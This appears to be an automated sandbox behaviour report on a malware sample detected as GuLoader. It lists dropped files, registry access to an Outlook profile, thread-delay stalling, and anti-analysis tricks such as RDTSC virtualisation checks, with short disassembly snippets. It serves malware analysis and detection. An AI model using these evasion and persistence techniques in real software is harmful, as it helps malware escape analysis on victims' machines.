Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.23885.29286.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.1982445379.0000000005CF4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 0_2_10002DB0 push eax; ret	0_2_10002DDE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F8C2F pushfd ; iretd	4_2_040F8C30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F8DDF push esp; iretd	4_2_040F8DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F891E pushad ; iretd	4_2_040F891F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_36B1AE1D push dword ptr [ebp+eax-18h]; retf	4_2_36B1AE21
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C6B487 push 8C37D2DEh; ret	4_2_37C6B495

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

File created: C:\Users\user\AppData\Local\Temp\nsp361A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Sympatiers.Bro	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Farveriets.Ste	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tiggerstavens.fes	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\aktioners.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\begrdeliges.pro	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\burdie.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\cartographer.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\histographies.txt	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\icekhana.txt	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\manxman.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\modstaaet.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\musicianer.spi	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\ndder.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\romantiserendes.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\Solide251	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\Solide251\semiquadrangle.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\Solide251\sugarcane.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\Solide251\tinkle.jpg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Steadily\Solide251\unagitatedness.txt	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	API/Special instruction interceptor: Address: 5DB476C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	API/Special instruction interceptor: Address: 226476C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	RDTSC instruction interceptor: First address: 5D56EEB second address: 5D56EEB instructions: 0x00000000 rdtsc 0x00000002 test cl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F36ED3704DEh 0x00000008 test dh, 0000007Eh 0x0000000b push ebx 0x0000000c mov ebx, 000000A6h 0x00000011 cmp ebx, 335C7F31h 0x00000017 jg 00007F36ED3CF897h 0x0000001d pop ebx 0x0000001e inc ebp 0x0000001f cmp al, cl 0x00000021 inc ebx 0x00000022 test dh, bh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	RDTSC instruction interceptor: First address: 2206EEB second address: 2206EEB instructions: 0x00000000 rdtsc 0x00000002 test cl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F36ED7C6C7Eh 0x00000008 test dh, 0000007Eh 0x0000000b push ebx 0x0000000c mov ebx, 000000A6h 0x00000011 cmp ebx, 335C7F31h 0x00000017 jg 00007F36ED826037h 0x0000001d pop ebx 0x0000001e inc ebp 0x0000001f cmp al, cl 0x00000021 inc ebx 0x00000022 test dh, bh 0x00000024 rdtsc

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Memory allocated: 40B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Memory allocated: 348D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Memory allocated: 347E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598243	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Window / User API: threadDelayed 7944			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Window / User API: threadDelayed 1878			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp361A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

API coverage: 1.7 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 6956	Thread sleep count: 7944 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 6956	Thread sleep count: 1878 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598243s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598141s >= -30000s	Jump to behavior
